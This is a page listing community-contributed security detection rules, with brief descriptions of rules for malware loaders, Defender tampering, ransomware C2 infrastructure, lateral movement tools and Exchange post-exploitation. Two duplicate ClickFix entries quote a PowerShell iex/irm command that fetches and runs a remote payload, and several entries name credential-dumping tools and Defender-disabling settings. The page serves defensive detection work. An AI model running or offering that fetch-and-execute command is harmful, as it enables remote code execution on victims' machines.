Detections

Explore public detection logic contributed by the community across SIEM and rule languages.

39,169 detections

This rule monitors for suspicious command-line activity involving the Fortis payment processor's webhook log files. It detects when attackers use tools like 'findstr', 'cmd', or 'dir' to navigate directories containing webhook data and specifically searches for payment card fields such as CVV, primary account numbers, and expiration dates, which is a common indicator of post-compromise data exfiltration.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
7 days ago
000
Detects DLL sideloading activity associated with the 'Lorem Ipsum Loader' malware. The rule monitors for specific combinations of legitimate Windows binaries loading specific DLLs from non-system directories, a common technique to execute malicious code via trusted processes.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
7 days ago
000
This rule detects HTTP requests where the User-Agent header indicates a PowerShell execution occurring from a system configured with the zh-CN locale. This pattern is often associated with automated scripts or potential malicious activity masquerading as legitimate PowerShell traffic.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
7 days ago
000
Detection of common web server reconnaissance, enumeration, and brute-force patterns targeting IIS environments. This includes detection of short-name (~1) probes, WebDAV method usage, NTFS alternate data stream requests, and brute-force attempts on login endpoints originating from PowerShell user agents.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
7 days ago
000
Detects the presence of an embedded word-to-hex lookup table within a PE file. This technique is used by the Lorem Ipsum Loader to store shellcode as plaintext English words to evade entropy-based detection and static analysis tools. The rule matches a dense sequence of lowercase words frequently found in these malicious loaders.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
7 days ago
000
The following analytic detects creation and removal of intermediary remediation artifacts of Windows Defender, during exploitation of ShieldCrash attacks.
Exploit abuses the race condition between file validation and its remediation performed by Windows Defender. In between these steps, ShieldCrash changes the
symbolic link to redirect the remediation process to a staging directory controlled by the attacker. This detection aims to detect creation of defender artifact,
its alternate data stream, and their subsequent removal.
Splunk Security@SplunkSecurity
avatar
Splunk Security Content
7 days ago
000
This rule correlates multiple telemetry sources (File Events, Certificate Info, Network Events, and DNS Events) to detect known malicious indicators, including specific file hashes, IP addresses, domains, and URLs associated with malicious activity.
avatar
Arnold Chan@slaz
Defender - KQL
13 days ago
003
This rule correlates multiple telemetry sources (File Events, Certificate Info, Network Events, and DNS Events) to detect known malicious indicators, including specific file hashes, IP addresses, domains, and URLs associated with malicious activity.
avatar
Arnold Chan@slaz
avatar
Detections.ai Community
13 days ago
003
This rule monitors for execution of files with specific SHA256 hashes known to be malicious, and network connections to a known malicious domain associated with Vultr storage. It aggregates file creation, process execution, and network connection events to detect potential threat activity.
avatar
Arnold Chan@slaz
avatar
Detections.ai Community
13 days ago
003
This rule detects potential malicious activity by matching file hashes against a known list of malicious indicators and monitoring for suspicious network connections. The network monitoring includes connections to hardcoded malicious IP addresses, specific C2 URLs, and DNS queries for known fallback domains used in malicious infrastructure when the initiating process is not a recognized web browser or wallet application.
avatar
Arnold Chan@slaz
avatar
Hunters
13 days ago
003
This rule detects potential malicious activity by matching file hashes against a known list of malicious indicators and monitoring for suspicious network connections. The network monitoring includes connections to hardcoded malicious IP addresses, specific C2 URLs, and DNS queries for known fallback domains used in malicious infrastructure when the initiating process is not a recognized web browser or wallet application.
avatar
Arnold Chan@slaz
avatar
Detection & Hunting Community
13 days ago
003
Detects post-exploitation indicators of CVE-2026-62911, an authentication-bypass-by-capture-replay vulnerability in Microsoft Exchange. The rule identifies anomalous behavior following a potential bypass: either the assignment of the ApplicationImpersonation management role or a single impersonation session accessing an abnormally high number of distinct mailboxes (FolderBind, MessageBind, or SendAs).
avatar
Ankit Mehta@Secvyn
avatar
Detections.ai Community
10 days ago
001
Detects the execution of a Node.js interpreter (node.exe or node) as a child process of a Fortinet management-related process, or where the command line contains references to Fortinet. This behavior is indicative of post-exploitation activity related to CVE-2025-25249, where a heap-based buffer overflow is exploited to deploy the PivotC2 remote access trojan.
avatar
Ankit Mehta@Secvyn
avatar
Detections.ai Community
10 days ago
001
Detects network connections, process command line arguments, and DNS queries associated with identified Galago or Panzer ransomware C2, leak site, or contact infrastructure (Tox IDs/Tor .onion addresses).
avatar
Ankit Mehta@Secvyn
avatar
Hunters
14 days ago
104
This rule monitors for known malicious indicators, including a specific file hash, a C2 IP address, a remote URL associated with potential malicious activity (anydesk.exe), and a domain associated with C3Pool crypto-mining activity, across device processes, network events, and file operations.
avatar
Arnold Chan@slaz
avatar
Detection & Hunting Community
13 days ago
003
This rule monitors for indicators of compromise (IOCs) associated with the Rapuncel/Cruciferra 'Bring Your Own Vulnerable Driver' (BYOVD) malware-as-a-service (MaaS) campaign. It detects malicious file hashes (associated with dropped binaries or drivers), connections to known malicious command-and-control (C2) IP addresses, and network requests to domains used by the infrastructure.
avatar
Arnold Chan@slaz
avatar
Detections.ai Community
14 days ago
004
This rule monitors for coordinated persistence efforts by detecting the occurrence of at least two out of three specific persistence techniques (registry run key modification, scheduled task creation, or WMI-based script execution) on the same device within a 30-minute window. It explicitly filters out activities from signed binaries or those occurring in standard system/application directories, focusing on potentially malicious artifacts originating from user-writable locations.
avatar
Arnold Chan@slaz
avatar
Detections.ai Community
15 days ago
005
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
avatar
Ankit Mehta@Secvyn
avatar
SlimKQL
15 days ago
105
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
avatar
Ankit Mehta@Secvyn
avatar
Detections.ai Community
15 days ago
305
This rule detects the execution of known lateral movement tools, including Impacket suite components and NetExec (formerly CrackMapExec), by monitoring process command lines. It specifically flags tools such as psexec.py, wmiexec.py, and secretsdump.py, which are frequently used for remote execution and credential dumping. The rule also joins these process events with network events targeting SMB port 445 to correlate tool usage with potential lateral movement activity.
avatar
Ankit Mehta@Secvyn
avatar
SlimKQL 2026
13 days ago
1103
Detects attempts to disable or tamper with Microsoft Windows Defender via registry modifications or malicious PowerShell/reg.exe commands, specifically targeting security settings like DisableAntiSpyware, DisableRealtimeMonitoring, and exclusion paths.
avatar
Ankit Mehta@Secvyn
avatar
SlimKQL 2026
13 days ago
303
Page 59 of 1866